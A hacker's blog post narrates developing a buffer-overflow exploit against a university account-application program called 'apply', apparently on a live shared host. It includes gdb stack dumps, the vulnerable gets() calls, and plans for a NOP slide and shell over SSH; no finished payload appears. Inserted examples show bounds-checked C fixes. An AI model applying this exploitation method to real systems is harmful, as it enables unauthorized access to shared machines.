Pearl — Hacking Apply Pt III

First was to obtain the source code from blade72,
/sources/apply-1.2
This wasn’t advertised; I happened to be digging around the filesystem one day and accidentally stumbled upon it :)

Fortunately it’s pre-compiled.. I move the sources to my own box..
run it..
Need to make the /home/apply user directory – need to create the whole apply user really.. – and the /home/apply/setup file.

-bash-4.3$ cat /home/apply/setup
cs320-1|Applied Discrete Math|Prof. E. Polker|||||

^ ^ ^ The above wasn’t given to me; I had to figure out the format from this incomplete snippet:

load_params(Param_set)
struct param_set Param_set[];
{
int fd, i, j, n, linecnt;
char *a, *b, *bufend, *recend;
struct param_set *p;
struct group *g;

	DBUG(HELLO,"load_params()\n",NULL);
 	if ( (fd=open(SETUP,O_RDONLY)) < 0 )
	    fatal("Cannot open SETUP file.\n");
	/*
	 * For now read the whole file.  If it becomes worth it,
	 * take the trouble to read lines and discard comments.
	 */
	bufend = (buf - 1 + sizeof(buf));
	n=1; /* kick start the loop -- ugly! */
	for ( b=buf ; n > 0 && b < (bufend-BUFSIZ) ; b += n )
	    if ( (n=read(fd,b,BUFSIZ)) < 0 ) 
		fatal("Read error while getting SETUP file.\n");
	if ( b >= bufend ) {
	    fatal("Out of buffer space for parameter sets.\n");
	}
	else
	    bufend = b;	/* remember where end of buffered data is */
	close(fd);
	*bufend = EOS;

	/*
	 * Now chug along the buffer, initializing the Param_set array.
	 */
	for ( linecnt = 1, i = 0, b = buf, p = Param_set;
	      ( i < NPSETS && b < bufend );
	      linecnt++, b = recend + 1 )
	    {
	    DBUG(8,"Parsing SETUP line %d:\n",linecnt);
	    if ((recend=index(b,EOL)) == 0)
		/* somebody emacs'd SETUP and missed the last linefeed */
		recend = bufend;
	    *recend = EOS;
	    if ( *b != COMMENT ) {
		setptr(&p->gr_name,      &a,&b,linecnt);
		setptr(&p->course_name,  &a,&b,linecnt);
		setptr(&p->instructor,   &a,&b,linecnt);
		setptr(&p->notify_apply, &a,&b,linecnt);
		setptr(&p->notify_reply, &a,&b,linecnt);
		setptr(&p->course_time,  &a,&b,linecnt);
		setptr(&p->acct_type,    &a,&b,linecnt);
		DBUG(IGNORE,"group name: %s\n",p->gr_name);
#ifdef REPLY	/* apply doesn't care about homes or group id's */
		setgrent();	/* open/rewind group file */
		if ((g=getgrnam(p->gr_name)) == NULL) {
		    printf("Group %s: ",p->gr_name);	/* tacky */
		    fatal("Cannot get gid from /etc/group.\n");
		}
		p->gr_gid = g->gr_gid;
		DBUG(8,"gid found: %d\n",p->gr_gid);
		for (j=0; b<recend && j<MAXHOMES; j++,b=a+1) {
		    p->homes[j] = b;
		    a = index(b,SFS);
		    if (a != 0)
			*a = EOS;
		    else
			a = recend;
		    DBUG(8,"\t\tp->homes[%d]==",j);
		    DBUG(8,"%s\n",b);
		}
		p->homes[j] = NULL; /* flag end of valid entries */
#endif /* REPLY */
		i++;
		p++;
	    }
	}
#ifdef REPLY
	endgrent();	/* close group file */
#endif /* REPLY */
	if ( b < bufend && i >= NPSETS )
	    fatal("Out of data structures for parameter sets!");
	DBUG(4,"load_params returning %d\n",i);
	return(i);	/* Number of sets loaded into array */
}

setptr(p,a,b,linecnt)
char **p, **a, **b;
{
	*p = *b;
	if ((*a = index(*b,PFS)) != 0) {
	    **a = EOS;
	    *b = *a+1;
	}
	else {
	    printf("Broken record in SETUP file: line %d.\n", linecnt);
	    fatal("Cannot continue.");
	}
}
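Added example, not code from apply itself: a bounds-checked C rewrite of the SETUP parsing that load_params() and setptr() above do. It takes the field separator PFS to be '|' (inferred from the sample setup line; the page never shows the real definition), assumes '#' for COMMENT, '\n' for EOL and 16 for NPSETS, and reports a broken record by line number instead of calling fatal().

```c
#include <stdio.h>
#include <string.h>

/* Separators assumed from the sample SETUP line; COMMENT, EOL and NPSETS
 * are guesses, the page does not show apply's definitions of them. */
#define PFS     '|'
#define COMMENT '#'
#define EOL     '\n'
#define NPSETS  16

struct param_set {
    const char *gr_name, *course_name, *instructor;
    const char *notify_apply, *notify_reply, *course_time, *acct_type;
};

/* Same job as setptr(): point *field at the text up to the next PFS,
 * NUL-terminate it and advance *b past the separator.  Returns -1
 * instead of calling fatal() when the record has no terminating PFS. */
static int setptr(const char **field, char **b)
{
    char *a = strchr(*b, PFS);
    if (a == NULL)
        return -1;                  /* "Broken record in SETUP file" */
    *a = '\0';
    *field = *b;
    *b = a + 1;
    return 0;
}

/* Walk a NUL-terminated SETUP buffer in place, like load_params() does.
 * Returns the number of sets loaded.  On failure returns -1 (broken
 * record) or -2 (more records than NPSETS) and stores the offending
 * line number in *bad_line.  Blank lines are skipped here; the original
 * would treat a blank line as a broken record. */
int load_params(char *buf, struct param_set sets[], int *bad_line)
{
    char *b = buf, *recend;
    int i = 0, linecnt = 1, had_eol;

    *bad_line = 0;
    while (*b != '\0') {
        recend = strchr(b, EOL);
        had_eol = (recend != NULL);
        if (!had_eol)                       /* missing final linefeed */
            recend = b + strlen(b);
        *recend = '\0';

        if (*b != COMMENT && *b != '\0') {
            struct param_set *p;
            if (i >= NPSETS) {
                *bad_line = linecnt;
                return -2;                  /* out of data structures */
            }
            p = &sets[i];
            if (setptr(&p->gr_name,      &b) || setptr(&p->course_name,  &b) ||
                setptr(&p->instructor,   &b) || setptr(&p->notify_apply, &b) ||
                setptr(&p->notify_reply, &b) || setptr(&p->course_time,  &b) ||
                setptr(&p->acct_type,    &b)) {
                *bad_line = linecnt;
                return -1;
            }
            /* whatever follows the seventh PFS (the homes list) is ignored,
             * as it is in the apply build of load_params() */
            i++;
        }
        b = had_eol ? recend + 1 : recend;
        linecnt++;
    }
    return i;
}

/* Fixed staging buffer standing in for apply's global buf, with the
 * "out of buffer space" check done up front instead of mid-read. */
static char buf[4096];

/* Copy text into the staging buffer and parse it.  Returns as load_params,
 * or -3 when the text does not fit.  Field pointers stay valid until the
 * next call. */
int parse_text(const char *text, struct param_set sets[], int *bad_line)
{
    if (strlen(text) >= sizeof buf) {
        *bad_line = 0;
        return -3;
    }
    strcpy(buf, text);
    return load_params(buf, sets, bad_line);
}

int main(void)
{
    /* constructed sample: the line from /home/apply/setup plus a comment */
    struct param_set sets[NPSETS];
    int bad, n = parse_text("cs320-1|Applied Discrete Math|Prof. E. Polker|||||\n"
                            "# a comment line\n", sets, &bad);
    if (n < 0) {
        printf("parse failed (%d) at line %d\n", n, bad);
        return 1;
    }
    for (int k = 0; k < n; k++)
        printf("%s: %s, %s\n", sets[k].gr_name, sets[k].course_name, sets[k].instructor);
    return 0;
}
```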

I learned a few IMPORTANT things.
I can send a buffer overflow through a raw PTY through SSH :) Did IT!
Compiling an app with/without debugging symbols does not affect the stack address.

I also now know it’s very important to attack the original binary, if at all possible, because things
such as stack frames being restored may differ between your own compilation of the program vs. the original.

Found my buffer overflow attack vector: register as new user, derp passwd, ugrad sign up, register 1 group course, q, then to “is this ok?” say “n”, and then put in a large buffer that starts with ‘q’ – q is for the first char to be processed as a direct return. Then you must agree that it looks “OK” with ‘y.’ Hopefully that caller stack is not too borked in that it can get to the return. If we get that far.. Well sweet sauce

It’s very important to ensure the nested target functions both ret/restore at the end of their functions. This ensures the stack is getting rotated and return values are popping.

-bash-4.3$ cd latest/apply-1.2-stock/
-bash-4.3$ ls
Makefile         apply-externs.o  make.history     reply-subr.o
OLD              apply-subr.o     make.out         reply.c
RCS              apply.c          mkaccounts       reply.o
README           apply.o          passwd.c         reply.real
add_groups       externs.c        ply.h            script
add_groups.c     how_to.tex.f90   reply            subr.c
apply            invoke2          reply-externs.o
-bash-4.3$ $PWD/invoke2 -d apply
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) break Review
Breakpoint 1 at 0x12434
(gdb) r
Starting program: /home/bazz/latest/apply-1.2-stock/apply
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Welcome to ---------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing the
DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during the
review phase.

Press RETURN to continue.

Do you already have an account with us (y or n)? n

Enter your chosen login name.  It can be up to 8 characters long, and should
only use lowercase letters and digits.  Please use your first initial and
last name, as in jdoe, unless you have a strong preference otherwise.
Login name? jdoe

Please enter your full name.  Be sure to use upper and lower case, as in
John Q. Public.  It is very important to get this right, as this is how
your name will appear on lab access lists and in mail messages you send.
Full name? jdoe

Enter a password consisting of printable characters, spaces or tabs.
It can be as long as you like, but only the first 8 characters matter.
Do not use your login or real name in any form -- too easy to guess.
**-*-* Do not give your password to anybody under any circumstances! *-*-**

As you type in your password, characters will not be echoed to your screen.
This is to protect your account.  To be sure you did not mis-type anything,
you will be asked to enter your password a second time.

Password:
   Again:

[Note: the password has to be entered via a PTY master]

Please describe yourself by choosing one of these menu items:

1) ugrad    Undergraduate student enrolled in one or more CS courses
2) grad     Graduate student enrolled in one or more CS courses
3) alumni   Alumnus of Math and CS
4) faculty  Member of the Math and CS faculty
5) staff    Member of the Math and CS professional or classified staff
6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
7)          None of the above.  (This will abandon the application!)
Menu item number [1-7] or command [tpx?] : 1

Now you will be shown a list of the available groups.  Classes are set up
as UNIX groups, and there are groups for other kinds of accounts, too.
Please enter the number(s) of the group(s) or class(es) that you belong in.
Enter them one at a time.  When there are no more to enter, type q to stop.
Remember that if you make an error, you will have a chance to do this again.

Sometimes the list is more than a screenful, so we use the `more` command
to present a screenful at a time.  If you see the '[More]' prompt, then
press RETURN for the next line, SPACE for the next screen.
You may want to write down the menu item numbers for your course(s).

Press RETURN to continue.

These are the categories of accounts:
 1) cs320-1   Applied Discrete Math     Prof. E. Bolker
Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-1] or command [cptqx?] : 1
Press RETURN to see menu again; 'q' to quit adding groups; '?' for more help.
Please enter a group number [1-1] or command [cptqx?] : q

Breakpoint 1, 0x00012434 in Review ()
(gdb) x/5i $pc
0x12434 <Review+8>:     sethi  %hi(0x29000), %g1
0x12438 <Review+12>:    or  %g1, 0x1a0, %o5     ! 0x291a0 <_iob+16>
0x1243c <Review+16>:    sethi  %hi(0x29000), %g1
0x12440 <Review+20>:    or  %g1, 0x1a0, %g1     ! 0x291a0 <_iob+16>
0x12444 <Review+24>:    ld  [ %g1 ], %g1
(gdb) x/5i $pc-8
0x1242c <Review>:       save  %sp, -112, %sp
0x12430 <Review+4>:     st  %i0, [ %fp + 0x44 ]
0x12434 <Review+8>:     sethi  %hi(0x29000), %g1
0x12438 <Review+12>:    or  %g1, 0x1a0, %o5     ! 0x291a0 <_iob+16>
0x1243c <Review+16>:    sethi  %hi(0x29000), %g1
(gdb) x/96x $sp
0xffbefd58:     0xffbef9a8      0x00028d90      0x00000000      0x00000000
0xffbefd68:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd78:     0x00027ccc      0x00028d91      0x0002919e      0x00000001
0xffbefd88:     0xff33c008      0x00000003      0xffbefdc8      0x00011434
0xffbefd98:     0x00000000      0x00027ccc      0x00027cc0      0x00000031
0xffbefda8:     0x00000032      0x00000000      0x00000001      0x00000000
0xffbefdb8:     0xff33f014      0xff320208      0xffbefdc8      0x0001135c
0xffbefdc8:     0xff33e5f0      0x00000000      0x00000000      0x00000000
0xffbefdd8:     0x00000000      0x00000000      0x00000000      0xff3de7a8
0xffbefde8:     0x00000001      0xffbefebc      0xffbefec4      0x0002a6e4
0xffbefdf8:     0x00000000      0x00000000      0xffbefe58      0x00010fec
0xffbefe08:     0x00000000      0x00027ccc      0xffbefe78      0x00000000
0xffbefe18:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe28:     0x00000003      0x00000000      0x00000000      0x00000000
0xffbefe38:     0x00000000      0xffffffff      0x00000000      0x00000000
0xffbefe48:     0x00000000      0x00000000      0xffbefe58      0x00010fac
0xffbefe58:     0x00000001      0xffbefebc      0x00000000      0x00000000
0xffbefe68:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe78:     0x00000000      0x00000000      0x00000000      0x00000000
---Type <return> to continue, or q <return> to quit---
0xffbefe88:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe98:     0x00000000      0x00000001      0xffbefebc      0x00000000
0xffbefea8:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefeb8:     0x00000001      0xffbeff50      0x00000000      0xffbeff78
0xffbefec8:     0xffbeff83      0xffbeff8c      0xffbeffb2      0x00000000
(gdb) b Edit
Breakpoint 2 at 0x12564
(gdb) c
Continuing.

Name: jdoe  Login: jdoe  Account type: ugrad  Group(s): cs320-1
Is this okay (y or n)? n

Breakpoint 2, 0x00012564 in Edit ()
(gdb) x/96x $sp
0xffbefce0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefcf0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd00:     0x00027ccc      0x000291a0      0x0000000a      0x00000002
0xffbefd10:     0xff33c008      0x000291a0      0xffbefd58      0x000124cc
0xffbefd20:     0xff33c008      0x000291a0      0x00025cc0      0xff343a54
0xffbefd30:     0x00000000      0x000294e0      0x00000000      0x000291a0
0xffbefd40:     0x00000001      0x00000001      0xff33c008      0x000291a0
0xffbefd50:     0xffbefd58      0x00012468      0xffbef9a8      0x00028d90
0xffbefd60:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd70:     0x00000000      0x00000000      0x00027ccc      0x00028d91
0xffbefd80:     0x0002919e      0x00000001      0xff33c008      0x00000003
0xffbefd90:     0xffbefdc8      0x00011434      0x00000000      0x00027ccc
0xffbefda0:     0x00027cc0      0x00000031      0x00000032      0x00000000
0xffbefdb0:     0x00000001      0x00000000      0xff33f014      0xff320208
0xffbefdc0:     0xffbefdc8      0x0001135c      0xff33e5f0      0x00000000
0xffbefdd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefde0:     0x00000000      0xff3de7a8      0x00000001      0xffbefebc
0xffbefdf0:     0xffbefec4      0x0002a6e4      0x00000000      0x00000000
0xffbefe00:     0xffbefe58      0x00010fec      0x00000000      0x00027ccc
---Type <return> to continue, or q <return> to quit---
0xffbefe10:     0xffbefe78      0x00000000      0x00000000      0x00000000
0xffbefe20:     0x00000000      0x00000000      0x00000003      0x00000000
0xffbefe30:     0x00000000      0x00000000      0x00000000      0xffffffff
0xffbefe40:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe50:     0xffbefe58      0x00010fac      0x00000001      0xffbefebc
(gdb)
-bash-4.3$ pwd
/home/bazz/latest/apply-1.2-stock
-bash-4.3$
-bash-4.3$ ./apply&

Welcome to --------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing the
DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during the
review phase.

Press RETURN to continue.
[1] 1092

[1]+  Stopped                 ./apply
-bash-4.3$ pmap 1092
1092:   ./apply
00010000     24K read/exec         apply
00024000      8K read/write/exec   apply
00026000     24K read/write/exec     [ heap ]
FF180000    576K read/exec         /usr/lib/libnsl.so.1
FF210000     40K read/write/exec   /usr/lib/libnsl.so.1
FF21A000     24K read/write/exec   /usr/lib/libnsl.so.1
FF250000     16K read/exec         /usr/platform/sun4u/lib/libc_psr.so.1
FF260000     16K read/exec         /usr/lib/libmp.so.2
FF274000      8K read/write/exec   /usr/lib/libmp.so.2
FF280000    688K read/exec         /usr/lib/libc.so.1
FF33C000     32K read/write/exec   /usr/lib/libc.so.1
FF350000      8K read/write/exec     [ anon ]
FF360000      8K read/write/exec   /usr/lib/libdl.so.1
FF370000     40K read/exec         /usr/lib/libsocket.so.1
FF38A000      8K read/write/exec   /usr/lib/libsocket.so.1
FF3A0000    184K read/exec         /usr/lib/ld.so.1
FF3DE000      8K read/write/exec   /usr/lib/ld.so.1
FF3E0000      8K read/write/exec   /usr/lib/ld.so.1
FFBEE000      8K read/write/exec     [ stack ]
 total     1728K
-bash-4.3$

This says that the stack in apply is also 8K, like in the test vuln program, and also starts at the same address.

TO BE CONTINUED —
from here on out I will keep it a secret and just let it go….. NAHT
I am going to exploit an overflow in the above targeted stack frames.
After I create a specific targeted exploit, I will then learn how to do NOP slide with automatic slicing offsets.

The current end goal is to be able to ssh into the target application, manually navigate to the vulnerable section, CTRL-D to trigger the buffer overflow. If a shell is spawned, disable all signal catchers by throwing another separate signal. Then haxxor away. Tell teh feds.
But, if the shell doesn’t spawn, an automatic slice counter should increment when the buffer signal is sent. I will then reconnect and perform manual duties — Send the buffer. This shouldn’t have to be done more than a max of 9 or 10 times or less, given that the stack is 8192 bytes, the buffer is 1024 before even starting to be overflowed. Plenty of room for a great NOP slide.. I will have to investigate the premium buffer. I am leaning towards putting the payload before the return address to make use of the guaranteed 1024 bytes + the few after 1024 that come before the %fp. Will have to calculate that.. Alright PEACE!

BACK AGAIN

-bash-4.3$ ./pty_apply
Opening master device
Doing Grantpt()
Unlocking pt
getting stdin termios
getting window settings
---Getting slave name
---Opening slave
Forking
in CHILD:
---Setsid()
---Pushing ptem module to slave
---Pushing ldterm module to slave
---setting term settings
---setting window settings
In Parent:
This shell is interactive
bazz@life[pts/8][~/latest/pty] bazz@life[pts/8][~/latest/pty] bazz@life[pts/8][~/latest] bazz@life[pts/8][~/latest]
bazz@life[pts/8][~/latest]
bazz@life[pts/8][~/latest]
bazz@life[pts/8][~/latest]

In the middle of the blind chaos I have to do

stty echo
bazz@life[pts/8][~/latest] cd ~/latest/apply-1.2-stock/
bazz@life[pts/8][~/latest/apply-1.2-stock] $PWD/invoke2 -d apply
GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) break Review
Breakpoint 1 at 0x12434
(gdb) break Edit
Breakpoint 2 at 0x12564
(gdb) r
Starting program: /home/bazz/latest/apply-1.2-stock/apply
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Welcome to --, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing the
DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during the
review phase.

Press RETURN to continue.

Do you already have an account with us (y or n)?

At this point it’s important to note that I have to use CTRL-J to make the newline, and hence continue..

It turns out that the attack vector illustrated above is not going to work. The buffer passed into gets() is a global buffer; I need something local to be easy. So I search around and I find this:

...

Never mind, it was a #ifdef code block that doesn’t actually count :(

gets(buf) from Login() looks good

Login(datap)
struct info *datap;
{
struct passwd *pw;
char	buf[1024], *ch, c;
int okay, n;

    DBUG(HELLO,"** Login()\n",NULL);
    if (action == MODIFY) {
	printf("You cannot change the login name of an existing account!\n");
	printf("If you MUST change your login see the system administrator.\n");
	return(0);
    }
    for ( okay=FALSE; okay==FALSE; ) {
	blurb(Login_inst);
	printf("Login name? ");
	gets(buf);

>_< nevermind

	if ((n=strlen(buf)) < 1)
	    continue;
	else {
	    if (n > MAXLOGLEN) {
		printf("Your login name must not be longer than %d characters.\n", MAXLOGLEN);
		printf("Please try again.\n");
		contin

How about the YES-OR-NO prompt?!?!

/* Ask a yes-or-no question. */
askyorn(prompt)
char	*prompt;
{
char	c[SBUF];
int	n;

    for (n=0; n < 10; ++n){
	printf("%s (y or n)? ", prompt);
	gets(c);
	switch (c[0]){
	    case 'y':
	    case 'Y': return(1);
	    case 'n':
	    case 'N': return(0);
	    default :
		      printf("Please answer y or n: ");
		      continue;
	}
    }
    return(0);	/* return negative if they can't get it right */
}

I THINK WE HAVE A WINNER
My goal is to be able to return into the overflowed buffer before the apply program submits any recorded data. Then someone could figure something out a lot easier. I just found my way in.
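The defect in askyorn() is gets() writing an unbounded line into c[SBUF] on the stack. As an added example (not apply's code), here is the same prompt rewritten around a bounded fgets() that also drains an overlong line so the leftover bytes can't be replayed into the next prompt. SBUF's real value isn't on the page, so 10 is assumed, and the input stream is a parameter so the function can be driven with constructed input.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SBUF 10     /* assumed; apply's real SBUF is not on the page */

/* Read one line into buf[len] from in.  Returns 1 for a complete line,
 * 2 if the line was longer than the buffer (the rest of the line is
 * read and thrown away so it cannot leak into the next prompt), and
 * 0 on EOF with nothing read.  A trailing newline is stripped. */
static int read_line(char *buf, size_t len, FILE *in)
{
    size_t n;
    int c, truncated = 0;

    if (fgets(buf, (int)len, in) == NULL) {
        buf[0] = '\0';
        return 0;
    }
    n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    /* no newline seen: the line filled the buffer (or hit EOF); drain it */
    while ((c = fgetc(in)) != EOF && c != '\n')
        truncated = 1;
    return truncated ? 2 : 1;
}

/* Same contract as apply's askyorn(): 1 for yes, 0 for no, 0 after ten
 * unusable answers.  apply reads stdin; here the stream is a parameter. */
int askyorn_safe(const char *prompt, FILE *in)
{
    char c[SBUF];
    int n, r;

    for (n = 0; n < 10; ++n) {
        printf("%s (y or n)? ", prompt);
        r = read_line(c, sizeof c, in);
        if (r == 0)
            return 0;               /* EOF: answer "no" rather than spin */
        if (r == 2) {
            printf("Answer too long; please answer y or n: ");
            continue;               /* counts as one wrong answer */
        }
        switch (c[0]) {
            case 'y':
            case 'Y': return 1;
            case 'n':
            case 'N': return 0;
            default:
                printf("Please answer y or n: ");
                continue;
        }
    }
    return 0;
}

/* Helper: run askyorn_safe over an in-memory string (constructed input). */
int answer_from_string(const char *prompt, const char *text)
{
    FILE *f = fmemopen((void *)text, strlen(text), "r");
    int r;
    if (f == NULL)
        return -1;
    r = askyorn_safe(prompt, f);
    fclose(f);
    return r;
}

/* Helper: a line of `len` bytes of 'A' (the kind of input that smashes
 * the original c[SBUF]) followed by a proper "y" answer. */
int answer_after_long_line(size_t len)
{
    char *text = malloc(len + 3);
    FILE *f;
    int r;
    if (text == NULL)
        return -1;
    memset(text, 'A', len);
    memcpy(text + len, "\ny\n", 3);
    f = fmemopen(text, len + 3, "r");
    r = f ? askyorn_safe("Is this okay", f) : -1;
    if (f)
        fclose(f);
    free(text);
    return r;
}

int main(void)
{
    printf("\n-> %d\n", answer_from_string("Is this okay", "n\n"));
    printf("\n-> %d\n", answer_after_long_line(6000));   /* the 6000-byte case */
    return 0;
}
```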

WELL I RAN into a new problem. The PTY write of a large buffer cuts out around 1300-1400. I wonder how I can get the full 6000 in there?? :( The answer is in fact that ‘stty echo’ should not be invoked. It has to do with it somehow…

AND THIS is the life of someone hacking from a raw terminal:

bazz@life[pts/15][~/latest/apply-1.2-stock]
Welcome to ------, our host that handles account applications.

This program collects information needed to create accounts, and queues
applications for action by the system administrator.  When all your
information has been collected, you will have the chance to review your
application and re-enter any information that is not correct.

If you make a mistake in typing, you can back up on the line by pressing the
DELETE key.  Do not use the BACKSPACE or arrow keys to delete characters --
your input may appear to have been fixed but will really contain garbage.
If you press the RETURN key before noticing an error, do not worry.  Simply
continue answering questions, and re-enter the information later during the
review phase.

Press RETURN to continue.
Do you already have an account with us (y or n)?
Enter your chosen login name.  It can be up to 8 characters long, and should
only use lowercase letters and digits.  Please use your first initial and
last name, as in jdoe, unless you have a strong preference otherwise.
Login name?
Enter your chosen login name.  It can be up to 8 characters long, and should
only use lowercase letters and digits.  Please use your first initial and
last name, as in jdoe, unless you have a strong preference otherwise.
Login name?
Please enter your full name.  Be sure to use upper and lower case, as in
John Q. Public.  It is very important to get this right, as this is how
your name will appear on lab access lists and in mail messages you send.
Full name?
Enter a password consisting of printable characters, spaces or tabs.
It can be as long as you like, but only the first 8 characters matter.
Do not use your login or real name in any form -- too easy to guess.
**-*-* Do not give your password to anybody under any circumstances! *-*-**

As you type in your password, characters will not be echoed to your screen.
This is to protect your account.  To be sure you did not mis-type anything,
you will be asked to enter your password a second time.

Password:
Again:


Please describe yourself by choosing one of these menu items:

1) ugrad    Undergraduate student enrolled in one or more CS courses
2) grad     Graduate student enrolled in one or more CS courses
3) alumni   Alumnus of Math and CS
4) faculty  Member of the Math and CS faculty
5) staff    Member of the Math and CS professional or classified staff
6) crtsy    Courtesy account applicant that has spoken to the Sys Admin
7)          None of the above.  (This will abandon the application!)
Menu item number [1-7] or command [tpx?] : You must select one of the choices.
Do you want to just forget the whole thing (y or n)? Menu item number [1-7] or command [tpx?] : Bus Error
bazz@life[pts/15][~/latest/apply-1.2-stock] bazz@life[pts/15][~/latest/apply-1.2-stock] GNU gdb 6.6
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.8"...
(no debugging symbols found)
(gdb) Dump of assembler code for function Acct:
0x000114c0 <Acct+0>:	save  %sp, -136, %sp
0x000114c4 <Acct+4>:	st  %i0, [ %fp + 0x44 ]
0x000114c8 <Acct+8>:	sethi  %hi(0x25800), %g1
0x000114cc <Acct+12>:	or  %g1, 0x260, %o0	! 0x25a60 <Acct_inst>
0x000114d0 <Acct+16>:	call  0x13274 <blurb>
0x000114d4 <Acct+20>:	nop
0x000114d8 <Acct+24>:	ld  [ %fp + 0x44 ], %g1
0x000114dc <Acct+28>:	add  %g1, 0x804, %g1
0x000114e0 <Acct+32>:	mov  %g1, %o0
0x000114e4 <Acct+36>:	sethi  %hi(0x13c00), %g1
0x000114e8 <Acct+40>:	or  %g1, 0x148, %o1	! 0x13d48
0x000114ec <Acct+44>:	call  0x25820 <strcpy@plt>
0x000114f0 <Acct+48>:	nop
---Type <return> to continue, or q <return> to quit---
0x000114f4 <Acct+52>:	sethi  %hi(0x13c00), %g1
0x000114f8 <Acct+56>:	or  %g1, 0x150, %o0	! 0x13d50
0x000114fc <Acct+60>:	mov  7, %o1
0x00011500 <Acct+64>:	call  0x257d8 <printf@plt>
0x00011504 <Acct+68>:	nop
0x00011508 <Acct+72>:	sethi  %hi(0x28c00), %g1
0x0001150c <Acct+76>:	or  %g1, 0x190, %o0	! 0x28d90 <ibuf>
0x00011510 <Acct+80>:	call  0x25808 <gets@plt>
0x00011514 <Acct+84>:	nop
0x00011518 <Acct+88>:	mov  %o0, %g1
0x0001151c <Acct+92>:	cmp  %g1, 0
0x00011520 <Acct+96>:	bne  0x1154c <Acct+140>
0x00011524 <Acct+100>:	nop
0x00011528 <Acct+104>:	sethi  %hi(0x28c00), %g1
---Type <return> to continue, or q <return> to quit---
0x0001152c <Acct+108>:	or  %g1, 0x190, %o5	! 0x28d90 <ibuf>
0x00011530 <Acct+112>:	mov  0x78, %g1
0x00011534 <Acct+116>:	stb  %g1, [ %o5 ]
0x00011538 <Acct+120>:	sethi  %hi(0x28c00), %g1
0x0001153c <Acct+124>:	or  %g1, 0x191, %g1	! 0x28d91 <ibuf+1>
0x00011540 <Acct+128>:	clrb  [ %g1 ]
0x00011544 <Acct+132>:	b  0x11574 <Acct+180>
0x00011548 <Acct+136>:	nop
0x0001154c <Acct+140>:	sethi  %hi(0x28c00), %g1
0x00011550 <Acct+144>:	or  %g1, 0x190, %g1	! 0x28d90 <ibuf>
0x00011554 <Acct+148>:	ldub  [ %g1 ], %g1
0x00011558 <Acct+152>:	sll  %g1, 0x18, %g1
                                                                                           0x0001155c <Acct+156>:	sra  %g1, 0x18, %g1
                                                                                                                                           0x00011560 <Acct+160>:	cmp  %g1, 0
                                   ---Type <return> to continue, or q <return> to quit---0x00011564 <Acct+164>:	bne  0x11574 <Acct+180>
                                                                                                                                       0x00011568 <Acct+168>:	nop
                    0x0001156c <Acct+172>:	b  0x114f4 <Acct+52>
                                                                    0x00011570 <Acct+176>:	nop
                                                                                                    0x00011574 <Acct+180>:	sethi  %hi(0x28c00), %g1
         0x00011578 <Acct+184>:	or  %g1, 0x190, %g1	! 0x28d90 <ibuf>
                                                                        0x0001157c <Acct+188>:	ldub  [ %g1 ], %g1
                                                                                                                  0x00011580 <Acct+192>:	sll  %g1, 0x18, %g1
                   0x00011584 <Acct+196>:	sra  %g1, 0x18, %g1
                                                                   0x00011588 <Acct+200>:	st  %g1, [ %fp + -36 ]
                                                                                                                      0x0001158c <Acct+204>:	ld  [ %fp + -36 ], %g1
                      0x00011590 <Acct+208>:	cmp  %g1, 0x74
                                                              0x00011594 <Acct+212>:	be  0x115ec <Acct+300>
